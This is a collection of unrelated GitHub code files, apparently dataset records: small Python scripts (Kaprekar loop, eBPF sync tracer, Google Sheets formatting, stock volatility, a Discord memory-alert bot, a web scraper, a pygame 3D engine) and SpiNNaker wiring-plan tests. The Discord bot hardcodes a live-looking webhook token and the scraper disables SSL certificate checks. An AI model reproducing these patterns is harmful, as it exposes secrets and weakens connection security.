correctionConfig,phisplitConfig=phisplitConfig,chi2Config=chi2Config,TowerMappingFile=subconfig['TowerMappingFile']\n )\n\n\n if ( config['function']['check_for_missing_modules'] ):\n subconfig = config['check_for_missing_modules']\n if ( subconfig['inMappingFile'] ):\n print(\"Missing modules in mapping file: \"+ subconfig['MappingFile'] + \"\\n\")\n check_for_missing_modules_inMappingFile(subconfig['MappingFile'],subconfig['CMSSW_Silicon'],subconfig['CMSSW_Scintillator'])\n if ( subconfig['inCMSSW'] ):\n print(\"\\nMissing modules in CMSSW\\n\")\n check_for_missing_modules_inCMSSW(subconfig['MappingFile'],subconfig['CMSSW_Silicon'],subconfig['CMSSW_Scintillator'])\n\n if ( config['function']['plot_lpGBTLoads'] ):\n subconfig = config['plot_lpGBTLoads']\n plot_lpGBTLoads(subconfig['MappingFile'],subconfig['CMSSW_Silicon'],subconfig['CMSSW_Scintillator'])\n\n if ( config['function']['plot_ModuleLoads'] ):\n subconfig = config['plot_ModuleLoads']\n plot_ModuleLoads(subconfig['MappingFile'],subconfig['CMSSW_Silicon'],subconfig['CMSSW_Scintillator'])\n\n if ( config['function']['produce_AllocationFile'] ):\n subconfig = config['produce_AllocationFile']\n produce_AllocationFile(subconfig['MappingFile'],subconfig['allocation'],minigroup_type=subconfig['minigroup_type'])\n\n if ( config['function']['produce_nTCsPerModuleHists'] ):\n subconfig = config['produce_nTCsPerModuleHists']\n produce_nTCsPerModuleHists(subconfig['MappingFile'],subconfig['allocation'],CMSSW_ModuleHists = 
subconfig['CMSSW_ModuleHists'],minigroup_type=subconfig['minigroup_type'],correctionConfig=None)\n\n \nmain()\n","repo_name":"mhassans/hgcal-linkmapping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"}
{"seq_id":"30437321074","text":"\"\"\"\nKaprekar constant/loop (6174) v. 2.2\n\nCoded by Kuba Siekierzynski (c) 2016\nOriginal code:\nhttps://code.sololearn.com/cv426gaf4R5E/#py\n\nnew in v. 2.2:\n- works with really big numbers\n- whole loops are now printed\n- added default value if invalid entry\n \nKaprekar constant/loop algorithm\n(check out my comment on this code for\nmore information on the problem)\n\nThis algorithm should produce 495 for 3-digit\nand 6174 (the original K) for 4-digit numbers.\n\nWorks for all x-digit numbers meeting\nstandard problem criteria. Either finds out\nthe ultimate number or the respective loop\nof numbers.\n\n\"\"\"\n\ntab = []\nloop = 'loop'\n# tab will hold all Kaprekar numbers found\n# loop is just for better wording\n\ndef asc(n):\n # puts the number's digits in ascending...\n return int(''.join(sorted(str(n))))\n\ndef desc(n):\n # ...and descending order\n return int(''.join(sorted(str(n))[::-1]))\n\nn = input(\"Specify a number: \")\ntry:\n n = int(n)\nexcept:\n # assuming n = 2016 to prevent program from crashing\n print(\"\\nInvalid number specified!!!\\nAssuming n = 2016.\")\n n = \"2016\"\nprint(\"\\nTransforming\", str(n) + \":\")\n\nwhile True:\n # iterates, assigns the new diff\n print(desc(n), \"-\", asc(n), \"=\", desc(n)-asc(n))\n n = desc(n) - asc(n)\n\n if n not in tab:\n # checks if already hit that number\n tab.append(n)\n else:\n if tab.index(n) == len(tab)-1:\n # if found as the last, it is a constant...\n tab = []\n tab.append(n)\n loop = 'constant'\n else:\n # ...otherwise it is a loop\n tab = tab[tab.index(n):]\n # strip the first, non-looping items\n break\n\nprint('Kaprekar', loop, 'reached:', tab)\n","repo_name":"kuba-siekierzynski/SoloLearn","sub_path":"Kaprekar.py","file_name":"Kaprekar.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"}
{"seq_id":"12818265011","text":"# to count the number of spaces, tabs and new line characters in a given string.\nstring = input(\"String is: \")\n# ,\" \",'\\t','\\n')\n\nspace = 0\ntabs = 0\nnew_line = 0\n\nfor chara in string:\n if(chara == \" \"):\n space +=1\n\n elif(chara == '\\t'):\n tabs += 1\n\n elif(chara== '\\n'):\n new_line += 1\n\n\nprint(\"this is space\",space)\n\nprint(\"this is tabs\",tabs)\n\nprint(\"this is new line\",new_line)\n","repo_name":"SagarikaNagpal/Python-Practice","sub_path":"QuesOnOops/C-1.py","file_name":"C-1.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"34389259380","text":"file = 'gamma.profile'\nsum = 0\nn = 0\nwith open(file, 'r') as fd:\n for i in range(100):\n fd.readline()\n for line in fd:\n l = line.split()\n sum+=float(l[1])\n n+=1\nf = sum/n\n\nprint(f)\n","repo_name":"luishcc/md-projects","sub_path":"tests/energy/readsurf.py","file_name":"readsurf.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"14661635844","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author:XuMing(xuming624@qq.com)\n@description: \n\"\"\"\nimport 
json\nimport os\n\n\ndef load_json(json_path, encoding='utf-8'):\n \"\"\"\n Loads a json args from a file.\n \"\"\"\n assert os.path.exists(json_path), \"Json file %s not found\" % json_path\n with open(json_path, 'r', encoding=encoding) as f:\n json_config = f.read()\n try:\n config = json.loads(json_config)\n except BaseException as err:\n raise Exception(\"Failed to validate args with error: %s\" % str(err))\n\n return config\n\n\ndef save_json(data, json_path, mode='w', encoding='utf-8'):\n dir = os.path.dirname(os.path.abspath(json_path))\n if not os.path.exists(dir):\n print(dir)\n os.makedirs(dir)\n with open(json_path, mode=mode, encoding=encoding) as f:\n f.write(json.dumps(data, ensure_ascii=False, indent=4))\n\n\ndef recursive_glob(rootdir=\".\", suffix=\"\"):\n \"\"\"Performs recursive glob with given suffix and rootdir\n :param rootdir is the root directory\n :param suffix is the suffix to be searched\n \"\"\"\n return [\n os.path.join(looproot, filename)\n for looproot, _, filenames in os.walk(rootdir)\n for filename in filenames\n if filename.endswith(suffix)\n ]\n\n\nif __name__ == '__main__':\n p = '../configs/resnet50_imagenet_classy_config.json'\n a = load_json(p)\n print(a)\n with open(p) as f:\n b = json.load(f)\n print(b)","repo_name":"shibing624/cvnet","sub_path":"cvnet/utils/io_utils.py","file_name":"io_utils.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"35590989857","text":"#!/usr/bin/env python3\nfrom bcc import BPF\n\nb = BPF(src_file=\"sync_perf_output.c\")\nb.attach_kprobe(event=b.get_syscall_fnname(\"sync\"), fn_name=\"hello\")\n\nprint(\"Tracing for quick sync's... Ctrl-C to end\")\n\nstart = 0\n\n\ndef print_event(cpu, data, size):\n global start\n event = b[\"events\"].event(data)\n\n if start == 0:\n start = int(event.time)\n start_time = (int(event.time) - start) / 1000000\n\n print(\"[PID:%6s] At time %d ms: multiple syncs detected, last %s ms ago\" % (\n event.pid, start_time, event.delta))\n\n\nb[\"events\"].open_perf_buffer(print_event)\n\nwhile 1:\n try:\n b.perf_buffer_poll()\n except KeyboardInterrupt:\n exit()\n","repo_name":"w01fb0ss/my_bpf_study","sub_path":"bcc/sync_perf_output.py","file_name":"sync_perf_output.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"44979283533","text":"# google cloud platform\nimport gspread\nfrom google.oauth2.service_account import Credentials\nimport os\nfrom dotenv import load_dotenv\nimport pandas as pd\nfrom gspread_dataframe import set_with_dataframe\nfrom gspread_formatting import *\n\nload_dotenv()\n\nscopes = [\n 'https://www.googleapis.com/auth/spreadsheets',\n 'https://www.googleapis.com/auth/drive'\n]\n\ncredentials = Credentials.from_service_account_file(\n './section6/secret.json',\n scopes=scopes\n)\n\ngc = gspread.authorize(credentials)\n# print(gc)\n\n\nSP_SHEET_KEY = os.environ['SP_SHEET_KEY']\nSP_SHEET = 'demo'\n\nsh = gc.open_by_key(SP_SHEET_KEY)\n# print(sh)\nworksheet = sh.worksheet(SP_SHEET)\n# print(worksheet)\ndata = worksheet.get_all_values()\n# print(data)\ndf = pd.DataFrame(data[2:], columns=data[1])\ndf = df.drop(df.columns[[0]], axis=1)\n# print(df)\n# print(df.dtypes)\ndf = df.astype({'年齢': int, '社員ID': int})\n# print(df.dtypes)\npvt_table = df.pivot_table(index=['所属'], values=['年齢'], aggfunc='mean')\n# print(pvt_table)\npvt_table['年齢'] = pvt_table['年齢'].round()\n# 
print(pvt_table)\nnew_worksheet = sh.add_worksheet(title='new', rows=100, cols=100)\n# print(new_worksheet)\nfirst_row = 2\nfirst_col = 2\nset_with_dataframe(new_worksheet, pvt_table.reset_index(),\n row=first_row, col=first_col)\n\nheader_range = 'B2:C2'\nindex_range = 'B3:B8'\nvalue_range = 'C3:C8'\n\nheader_fmt = cellFormat(\n backgroundColor=color(38/255, 166/255, 154/255),\n textFormat=textFormat(\n bold=True, foregroundColor=color(255/255, 255/255, 255/255)),\n horizontalAlignment='CENTER'\n)\n\nformat_cell_range(new_worksheet, header_range, header_fmt)\n\nborder = Border('SOLID', Color(0, 0, 0, 0))\nfmt = CellFormat(borders=Borders(\n top=border, bottom=border, left=border, right=border))\nformat_cell_range(new_worksheet, header_range, fmt)\nformat_cell_range(new_worksheet, index_range, fmt)\nformat_cell_range(new_worksheet, value_range, fmt)\n","repo_name":"kyjp/api_python","sub_path":"section6/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"9269665429","text":"import yfinance as yf\nimport pandas as pd\nimport datetime\nfrom dateutil.relativedelta import relativedelta\nimport numpy as np\n\npd.options.mode.chained_assignment = None\n\nticker = 'KWEB'\nend = datetime.date.today().strftime(\"%Y-%m-%d\")\nstart = datetime.date.today() + relativedelta(years=-1)\nstart = start.strftime(\"%Y-%m-%d\")\n\nohlc = pd.DataFrame()\nohlc['Adj Close'] = yf.download(ticker, start, end)['Adj Close']\nprint(ohlc)\n\nprint(ohlc)\nohlc['returns'] = np.log(ohlc/ohlc.shift(-1))\nprint(ohlc['returns'])\nwindow_len = int(len(ohlc) / 2)\nprint(window_len)\n\ngh = ohlc['returns'].rolling(window_len).std()*(252**0.5)\nprint(gh)\n\n\ndays_10 = ohlc['Adj Close'][-10:]\nret_10 = np.log(days_10/days_10.shift(-1))\ndaily_std_10 = np.std(ret_10)\nstd_10 = daily_std_10 * 252 ** .5\nstd_10 = round(std_10 * 100, 2)\nprint(std_10)\nprint(round(gh.min() * 100, 2))\n","repo_name":"Badchaos11/fin_bot","sub_path":"develop/china_2.py","file_name":"china_2.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"37525126880","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport sys # Allows capturing the command-line parameters\nimport requests # Send HTTP requests in a simple way\nimport json # Encode in JSON format\n\n__author__ = \"Unai Cervantes\"\n__email__ = \"cf19unai.cervantes@iesjoandaustria.org\"\n__license__ = \"GPL V3\"\n\n\"\"\"\nWill send a message to Discord if the available memory is below half.\n\"\"\"\nganxo = 'https://discord.com/api/webhooks/976504155092975687/fqEOMfHAnmLh3xZ6_22lZTWEt31Otl7lk32dzeD2luYtqb8OfBg3wBqc9KXi4H1A8JOZ'\n\n\ndef llegir_dades():\n with open(\"/proc/meminfo\") as memoria:\n total = memoria.readline()\n total = elimina_frase(total,\"MemTotal:\")\n lliure = memoria.readline()\n lliure = elimina_frase(lliure,\"MemFree:\")\n disponible = memoria.readline()\n disponible = elimina_frase(disponible,\"MemAvailable:\")\n \n return total,lliure,disponible\n\n\ndef elimina_frase(cadena,eliminar):\n cadena = cadena.replace(eliminar,\"\")\n cadena = cadena.replace(\"kB\",\"\")\n cadena = cadena.strip()\n return cadena\n\ndef comprova_memoria():\n total,lliure,disponible =llegir_dades()\n if int(lliure)/int(total) < 0.5:\n return True\n return False\n\ndef main(ganxo):\n missatge = \"La memòria es inferior a la meitat\"\n resultat 
= \"[X] Alguna cosa ha anat malament! :( \"\n capcaleres = {'Content-Type': 'application/json'}\n carrega = {\"content\": missatge}\n if comprova_memoria() == True:\n resposta = requests.post(\n ganxo, \n data=json.dumps(carrega), \n headers=capcaleres\n )\n if resposta.ok:\n resultat = \"Missatge enviat\"\n else:\n resultat = \"La memòria no supera la meitat d'utilització.\"\n return resultat\n\n\nif __name__ == \"__main__\":\n print(main(ganxo))","repo_name":"unaicervantes/ProgramacionASIX_CervantesUnai","sub_path":"Estructures/Exercicis/bot_informacio_CerevantesUnai.py","file_name":"bot_informacio_CerevantesUnai.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6216133450","text":"from urllib.request import urlopen\r\nimport ssl\r\nfrom bs4 import BeautifulSoup\r\n\r\n#Ignore SSL certificate errors\r\nctx = ssl.create_default_context()\r\nctx.check_hostname = False\r\nctx.verify_mode = ssl.CERT_NONE\r\n\r\ndef FindName():\r\n\r\n url = 'http://py4e-data.dr-chuck.net/known_by_Martin.html'\r\n html = urlopen(url,context = ctx).read()\r\n soup = BeautifulSoup(html,'html.parser')\r\n\r\n #retrieves names by following the steps below\r\n tags = soup('a')\r\n j = 0\r\n for j in range(7):\r\n c = 0\r\n for tag in tags:\r\n c+= 1\r\n if(c == 18):\r\n url= tag.get('href',None)\r\n html= urlopen(url,context= ctx).read()\r\n soup= BeautifulSoup(html,'html.parser')\r\n tags = soup('a')\r\n break\r\n print(tag.contents[0])\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n FindName()\r\n\r\n\r\n","repo_name":"saket2508/Coursera_pyWebData","sub_path":"urllibFindName.py","file_name":"urllibFindName.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"3736120144","text":"from imported_libs import *\r\n\r\npygame.init()\r\npygame.display.set_caption('3D Engine')\r\n#screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\r\n#w, h = screen.get_size()\r\nscreen = pygame.display.set_mode((500, 500))\r\nw, h = 500, 500\r\ncx, cy = int(w / 2), int(h / 2)\r\nclock = pygame.time.Clock()\r\nfov = 90\r\n\r\nverts = []\r\nfaces = []\r\n\r\nfilepath = 'objects/pokus3.obj'\r\nwith open(filepath) as fp:\r\n line = fp.readline()\r\n cnt = 1\r\n while line:\r\n a = line.strip().split(\" \")\r\n\r\n if a[0] == \"v\":\r\n v = [float(a[1]), float(a[2]), float(a[3])]\r\n verts.append(v)\r\n\r\n elif a[0] == \"f\":\r\n f = [float(a[1]), float(a[2]), float(a[3])]\r\n faces.append(f)\r\n\r\n line = fp.readline()\r\n cnt += 1\r\n\r\nclass Shape():\r\n\r\n def __init__(self):\r\n t = np.zeros((len(faces), 3, 4))\r\n for i in range(len(faces)):\r\n v1 = verts[int(faces[i][0] - 1)] + [1]\r\n v2 = verts[int(faces[i][1] - 1)] + [1]\r\n v3 = verts[int(faces[i][2] - 1)] + [1]\r\n t[i][0] = v1\r\n t[i][1] = v2\r\n t[i][2] = v3\r\n self.triangles = t\r\n\r\n\r\nclass Camera():\r\n\r\n def __init__(self):\r\n self.pos = np.array([0, 0, 0])\r\n self.dir = np.array([0, 0, 1])\r\n self.yaw = 0\r\n\r\n def update(self, key, dt):\r\n\r\n forward = np.dot(camera.dir, 8*dt)\r\n if key[pygame.K_w]:\r\n self.pos = np.add(self.pos, forward)\r\n\r\n if key[pygame.K_s]:\r\n self.pos = np.subtract(self.pos, forward)\r\n\r\n if key[pygame.K_a]:\r\n self.yaw -= 2*dt\r\n\r\n if key[pygame.K_d]:\r\n self.yaw += 2*dt\r\n\r\n\r\ncamera = Camera()\r\nshape = Shape()\r\n\r\nz1 = 0.1\r\nz2 = 1000\r\nr = h / w\r\nf = 1 / tan(radians(fov / 
2))\r\n\r\nprojection = np.array([[r * f, 0, 0, 0],\r\n [0, f, 0, 0],\r\n [0, 0, z2 / (z2 - z1), 1],\r\n [0, 0, (-z1 * z2) / (z2 - z1), 0]])\r\n\r\ntheta = 0\r\nrunning = True\r\nwhile running:\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT: pygame.quit(); sys.exit(); running = False\r\n if event.type == pygame.KEYDOWN:\r\n global_key = pygame.key.get_pressed()\r\n if global_key[pygame.K_ESCAPE]:\r\n running = False\r\n pygame.quit()\r\n sys.exit()\r\n\r\n screen.fill((0, 0, 0))\r\n\r\n rotation_Z = rotate_Z(theta)\r\n rotation_X = rotate_X(0)\r\n rotation_Y = rotate_Y(3/2*pi + theta)\r\n\r\n theta += 0.02\r\n\r\n dt = clock.tick() / 1000\r\n key = pygame.key.get_pressed()\r\n camera.update(key, dt)\r\n\r\n Up = np.array([0, 1, 0])\r\n FW = np.array([0,0,1])\r\n camera_rotation = rotate_Y_3(camera.yaw)\r\n camera.dir = np.dot(camera_rotation, FW)\r\n FW = np.add(camera.pos, camera.dir)\r\n\r\n camera_matrix = matrix_pointat(camera.pos, FW, Up)\r\n #view_matrix = matrix_inverse(camera_matrix)\r\n view_matrix = np.linalg.inv(camera_matrix)\r\n\r\n depth_list = []\r\n\r\n for triangle in shape.triangles:\r\n\r\n triangle_translated = np.zeros((3,4))\r\n\r\n for i in range(3):\r\n triangle_translated[i] = np.dot(np.dot(triangle[i], rotation_Y), rotation_X)\r\n triangle_translated[i, 2] = np.add(triangle_translated[i, 2], 6)\r\n\r\n vector_1 = create_vector(triangle_translated[1], triangle_translated[0])\r\n vector_2 = create_vector(triangle_translated[2], triangle_translated[0])\r\n\r\n normal = np.cross(vector_1, vector_2)\r\n normal = normalize(normal)\r\n\r\n camera_ray = create_vector(triangle_translated[0], camera.pos)\r\n\r\n if np.dot(normal, camera_ray) < 0:\r\n light = [0, 0, -1]\r\n light = normalize(light)\r\n dot_product = np.dot(light, normal)\r\n a = mapX(max(dot_product, 0.1), 0, 1, 0, 255)\r\n\r\n triangle_viewed = np.zeros((3, 4))\r\n triangle_viewed[0] = np.dot(view_matrix, triangle_translated[0])\r\n triangle_viewed[1] = np.dot(view_matrix, triangle_translated[1])\r\n triangle_viewed[2] = np.dot(view_matrix, triangle_translated[2])\r\n\r\n triangle_projected = np.zeros((3, 3))\r\n for i in range(3):\r\n triangle_p = multiply_normalize(triangle_viewed[i], projection)\r\n triangle_projected[i] = triangle_p\r\n\r\n for i in range(3):\r\n triangle_projected[i, 0] *= -1\r\n triangle_projected[i, 1] *= -1\r\n\r\n x, y = [], []\r\n for i in range(3):\r\n triangle_projected[i, 0] += 1#np.add(triangle_projected[i, 0], 1)\r\n triangle_projected[i, 1] += 1#np.add(triangle_projected[i, 1], 1)\r\n triangle_projected[i, 0] *= 0.5 * w\r\n triangle_projected[i, 1] *= 0.5 * h\r\n x.append(triangle_projected[i, 0])\r\n y.append(triangle_projected[i, 1])\r\n\r\n z = (triangle_translated[0][2] + triangle_translated[1][2] + triangle_translated[2][2]) / 3\r\n depth_list.append([z, [x[0], y[0]], [x[1], y[1]], [x[2], y[2]], a])\r\n\r\n depth_list = sorted(depth_list, reverse=1)\r\n\r\n for i in range(len(depth_list)):\r\n pygame.draw.polygon(screen, (depth_list[i][4], depth_list[i][4], depth_list[i][4]),\r\n ((depth_list[i][1][0], depth_list[i][1][1]),\r\n (depth_list[i][2][0], depth_list[i][2][1]),\r\n (depth_list[i][3][0], depth_list[i][3][1])), 0)\r\n\r\n pygame.display.flip()\r\n","repo_name":"1Kori256/python_3d_engine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1620927500","text":"import pytest\n\nfrom six import 
iteritems\n\nfrom example_cabinet_params import real\n\nfrom spinner import plan\nfrom spinner import board\nfrom spinner import topology\nfrom spinner import transforms\nfrom spinner import utils\nfrom spinner import coordinates\nfrom spinner import cabinet\nfrom spinner import metrics\n\nfrom spinner.topology import Direction\n\n\ndef test_enumerate_wires():\n\t# Special case: empty\n\tassert plan.enumerate_wires([]) == []\n\t\n\t# Test exhaustively with a triad\n\tboards = board.create_torus()\n\tc2b = {topology.to_xy(c): b for b,c in boards}\n\twires = plan.enumerate_wires(boards)\n\tassert len(wires) == 3 * 3\n\tassert set(wires) == set([\n\t\t# From (0, 0)\n\t\t((c2b[(0,0)], Direction.north), (c2b[(0,1)], Direction.south)),\n\t\t((c2b[(0,0)], Direction.east), (c2b[(0,1)], Direction.west)),\n\t\t((c2b[(0,0)], Direction.south_west), (c2b[(0,1)], Direction.north_east)),\n\t\t# From (0, 1)\n\t\t((c2b[(0,1)], Direction.north), (c2b[(1,1)], Direction.south)),\n\t\t((c2b[(0,1)], Direction.east), (c2b[(1,1)], Direction.west)),\n\t\t((c2b[(0,1)], Direction.south_west), (c2b[(1,1)], Direction.north_east)),\n\t\t# From (1, 1)\n\t\t((c2b[(1,1)], Direction.north), (c2b[(0,0)], Direction.south)),\n\t\t((c2b[(1,1)], Direction.east), (c2b[(0,0)], Direction.west)),\n\t\t((c2b[(1,1)], Direction.south_west), (c2b[(0,0)], Direction.north_east)),\n\t])\n\n\ndef test_partition_wires():\n\t# Verify the correctness with a two-cabinet system.\n\thex_boards, folded_boards = utils.folded_torus(10, 8, \"shear\", \"rows\", (2,2))\n\tcabinetised_boards = transforms.cabinetise(folded_boards, 2, 5, 24)\n\tall_wires = plan.enumerate_wires(cabinetised_boards)\n\t\n\tbetween_boards, between_frames, between_cabinets =\\\n\t\tplan.partition_wires(all_wires, cabinetised_boards)\n\t\n\t# Should have the correct set of categories\n\tassert len(between_boards) == 5 * 2\n\tassert len(between_frames) == 2\n\t\n\tseen_wires = set()\n\tb2c = dict(cabinetised_boards)\n\t\n\tfor (cabinet, frame), wires in iteritems(between_boards):\n\t\tassert 0 <= cabinet < 2\n\t\tassert 0 <= frame < 5\n\t\tfor ((src_board, src_direction), (dst_board, dst_direction)) in wires:\n\t\t\t# Check it really does stay in the same frame\n\t\t\tsc, sf, sb = b2c[src_board]\n\t\t\tdc, df, db = b2c[dst_board]\n\t\t\tassert sc == cabinet\n\t\t\tassert dc == cabinet\n\t\t\tassert sf == frame\n\t\t\tassert df == frame\n\t\t\tassert (sc, sf) == (dc, df)\n\t\t\tassert src_direction.opposite == dst_direction\n\t\t\t\n\t\t\t# Check we've not seen it before\n\t\t\twire = ((src_board, src_direction), (dst_board, dst_direction))\n\t\t\tassert wire not in seen_wires\n\t\t\tseen_wires.add(wire)\n\t\n\tfor cabinet, wires in iteritems(between_frames):\n\t\tassert 0 <= cabinet < 2\n\t\tfor ((src_board, src_direction), (dst_board, dst_direction)) in wires:\n\t\t\t# Check it really does stay in the same cabinet\n\t\t\tsc, sf, sb = b2c[src_board]\n\t\t\tdc, df, db = b2c[dst_board]\n\t\t\tassert sc == cabinet\n\t\t\tassert dc == cabinet\n\t\t\tassert sc == dc\n\t\t\tassert sf != df\n\t\t\tassert src_direction.opposite == dst_direction\n\t\t\t\n\t\t\t# Check we've not seen it before\n\t\t\twire = ((src_board, src_direction), (dst_board, dst_direction))\n\t\t\tassert wire not in seen_wires\n\t\t\tseen_wires.add(wire)\n\t\n\tfrom pprint import pprint\n\tfor ((src_board, src_direction), (dst_board, dst_direction)) in between_cabinets:\n\t\t# Check it really doesn't stay within a cabinet\n\t\tsc, sf, sb = b2c[src_board]\n\t\tdc, df, db = b2c[dst_board]\n\t\tassert sc != 
dc\n\t\tassert src_direction.opposite == dst_direction\n\t\t\n\t\t# Check we've not seen it before\n\t\twire = ((src_board, src_direction), (dst_board, dst_direction))\n\t\tassert wire not in seen_wires\n\t\tseen_wires.add(wire)\n\t\n\t# Should have seen all wires too!\n\tassert seen_wires == set(all_wires)\n\n\ndef test_assign_wires():\n\t# Simply check the appropriateness of each point provided in an example system.\n\thex_boards, folded_boards = utils.folded_torus(4, 2, \"shear\", \"rows\", (2,2))\n\tcabinetised_boards = transforms.cabinetise(folded_boards, 1, 1, 24)\n\twires = plan.enumerate_wires(cabinetised_boards)\n\t\n\t# Map each board to a point along a line.\n\tphysical_boards = [(board, coordinates.Cartesian3D(float(b), 0.0, 0.0))\n\t for board, (c, f, b) in cabinetised_boards]\n\tb2c = dict(physical_boards)\n\t\n\t# Given in no particular order\n\tavailable_wire_lengths = [8.0, 3.0, 24.0]\n\t\n\tboard_wire_offset = {\n\t\tDirection.north: coordinates.Cartesian3D(0.0, 0.0, 0.0),\n\t\tDirection.south: coordinates.Cartesian3D(1.0, 0.0, 0.0),\n\t\tDirection.east: coordinates.Cartesian3D(0.0, 1.0, 0.0),\n\t\tDirection.west: coordinates.Cartesian3D(0.0, 0.0, 1.0),\n\t\tDirection.north_east: coordinates.Cartesian3D(1.0, 1.0, 1.0),\n\t\tDirection.south_west: coordinates.Cartesian3D(-1.0, -1.0, -1.0),\n\t}\n\t\n\tlast_wire = None\n\tlast_arc_height = None\n\tfor src, dst, wire in plan.assign_wires(wires, physical_boards,\n\t board_wire_offset,\n\t available_wire_lengths, 0.0):\n\t\t# Check the wire was chosen correctly\n\t\tdistance = ((b2c[src[0]] + board_wire_offset[src[1]]) -\n\t\t (b2c[dst[0]] + board_wire_offset[dst[1]])).magnitude()\n\t\tshortest_possible_wire, arc_height = metrics.physical_wire_length(\n\t\t\tdistance, available_wire_lengths, 0.0)\n\t\tassert wire == shortest_possible_wire\n\t\t\n\t\t# Make sure wires are given in ascending order of arc height unless the\n\t\t# wire length changes\n\t\tif last_wire == wire and last_arc_height is not None:\n\t\t\tassert arc_height >= last_arc_height\n\t\tlast_arc_height = arc_height\n\t\t\n\t\tlast_wire = wire\n\n\ndef test_generate_wiring_plan():\n\t# Since generate_wiring_plan is largely a wrapper around the functions tested\n\t# above, this simply tests that the output is not insane...\n\thex_boards, folded_boards = utils.folded_torus(10, 8, \"shear\", \"rows\", (2,2))\n\tcabinetised_boards = transforms.cabinetise(folded_boards, 2, 5, 24)\n\tcab = cabinet.Cabinet(**real)\n\tphysical_boards = transforms.cabinet_to_physical(cabinetised_boards, cab)\n\tall_wires = plan.enumerate_wires(cabinetised_boards)\n\tavailable_wire_lengths = [0.3, 0.5, 1.0]\n\t\n\tb2c = dict(cabinetised_boards)\n\t\n\tbetween_boards, between_frames, between_cabinets =\\\n\t\tplan.generate_wiring_plan(cabinetised_boards, physical_boards,\n\t\t cab.board_wire_offset,\n\t\t available_wire_lengths,\n\t\t 0.0)\n\t\n\tseen_wires = set()\n\t\n\tassert set(between_boards) == set((c, f, d)\n\t for c in range(cab.num_cabinets)\n\t for f in range(cab.frames_per_cabinet)\n\t for d in [Direction.north,\n\t Direction.south_west,\n\t Direction.east])\n\tfor (cabinet_num, frame_num, direction), wires in iteritems(between_boards):\n\t\tfor ((src_board, src_direction), (dst_board, dst_direction),\n\t\t wire_length) in wires:\n\t\t\t# The board does stay in the frame_num and goes in the specified direction\n\t\t\tc, f, b = b2c[src_board]\n\t\t\tassert c == cabinet_num\n\t\t\tassert f == frame_num\n\t\t\tassert src_direction == direction\n\t\t\t\n\t\t\tc, f, b = 
b2c[dst_board]\n\t\t\tassert c == cabinet_num\n\t\t\tassert f == frame_num\n\t\t\tassert dst_direction == direction.opposite\n\t\t\t\n\t\t\t# The wire length chosen should exist\n\t\t\tassert wire_length in available_wire_lengths\n\t\t\t\n\t\t\t# Check we've not seen it before\n\t\t\twire = ((src_board, src_direction), (dst_board, dst_direction))\n\t\t\tassert wire not in seen_wires\n\t\t\tseen_wires.add(wire)\n\t\n\tassert set(between_frames) == set((c, d)\n\t for c in range(cab.num_cabinets)\n\t for d in [Direction.north,\n\t Direction.south_west,\n\t Direction.east])\n\tfor (cabinet_num, direction), wires in iteritems(between_frames):\n\t\tfor ((src_board, src_direction), (dst_board, dst_direction),\n\t\t wire_length) in wires:\n\t\t\t# The board does stay in the cabinet and goes in the specified direction\n\t\t\tc, f, b = b2c[src_board]\n\t\t\tassert c == cabinet_num\n\t\t\tassert src_direction == direction\n\t\t\t\n\t\t\tc, f, b = b2c[dst_board]\n\t\t\tassert c == cabinet_num\n\t\t\tassert dst_direction == direction.opposite\n\t\t\t\n\t\t\tassert wire_length in available_wire_lengths\n\t\t\t\n\t\t\t# Check we've not seen it before\n\t\t\twire = ((src_board, src_direction), (dst_board, dst_direction))\n\t\t\tassert wire not in seen_wires\n\t\t\tseen_wires.add(wire)\n\t\n\tassert set(between_cabinets) == set([Direction.north,\n\t Direction.south_west,\n\t Direction.east])\n\tfor direction, wires in iteritems(between_cabinets):\n\t\tfor ((src_board, src_direction), (dst_board, dst_direction),\n\t\t wire_length) in wires:\n\t\t\t# The board does stay in the cabinet and goes in the specified direction\n\t\t\tassert src_direction == direction\n\t\t\tassert dst_direction == direction.opposite\n\t\t\t\n\t\t\tassert wire_length in available_wire_lengths\n\t\t\t\n\t\t\t# Check we've not seen it before\n\t\t\twire = ((src_board, src_direction), (dst_board, dst_direction))\n\t\t\tassert wire not in seen_wires\n\t\t\tseen_wires.add(wire)\n\t\n\t# All wires should have been seen\n\tassert seen_wires == set(all_wires)\n\n\ndef test_flatten_wiring_plan():\n\t# Provide an artificial input to this function with a known correct sorting.\n\t# In the input, the board object is replaced with an integer indicating its\n\t# correct position in the ordering.\n\t\n\tcab = cabinet.Cabinet(**real)\n\tdirection_order = sorted([Direction.north, Direction.east, Direction.south_west],\n\t key=(lambda d: cab.board_wire_offset[d].y))\n\t\n\tnum = [0]\n\tdef 